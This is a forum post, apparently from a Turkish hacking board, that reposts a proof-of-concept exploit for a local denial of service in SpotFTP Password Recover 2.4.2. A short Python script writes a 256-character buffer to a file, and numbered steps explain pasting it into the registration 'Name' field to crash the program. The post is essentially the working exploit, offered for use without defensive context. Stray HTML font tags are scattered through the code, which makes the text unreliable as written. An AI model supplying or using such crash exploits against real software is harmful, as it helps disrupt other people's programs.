Hoşgeldin Misafir

SpotFTP Password Recover 2.4.2 - Name Denial of Service Exploit

SurHan

28 Kas 2017
4,185 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Kod:
# Exploit Title: SpotFTP Password Recover 2.4.2 - 'Name' Denial of Service (PoC)<font></font>
# Discovery by: Luis Martinez<font></font>
# Vendor Homepage: www.nsauditor.com<font></font>
# Software Link : http://www.nsauditor.com/downloads/spotftp_setup.exe<font></font>
# Tested Version: 2.4.2<font></font>
# Vulnerability Type: Denial of Service (DoS) Local<font></font>
# Tested on OS: Windows 10 Pro x64 es<font></font>
<font></font>
# Steps to Produce the Crash: <font></font>
# 1.- Run python code : python SpotFTP_Password_Recover_2.4.2.py<font></font>
# 2.- Open SpotFTP_Password_Recover_2.4.2.txt and copy content to clipboard<font></font>
# 3.- Open SpotFTP<font></font>
# 4.- Register -> Enter Registration Code...<font></font>
# 5.- Paste ClipBoard on "Name:"<font></font>
# 6.- Key: -> L4M5<font></font>
# 7.- OK<font></font>
# 8.- Crashed<font></font>
<font></font>
#!/usr/bin/env python<font></font>
 <font></font>
buffer = "\x41" * 256<font></font>
f = open ("SpotFTP_Password_Recover_2.4.2.txt", "w")<font></font>
f.write(buffer)<font></font>
f.close()<font></font>
<font></font>
<font></font>
#  0day.today [2019-01-08]  #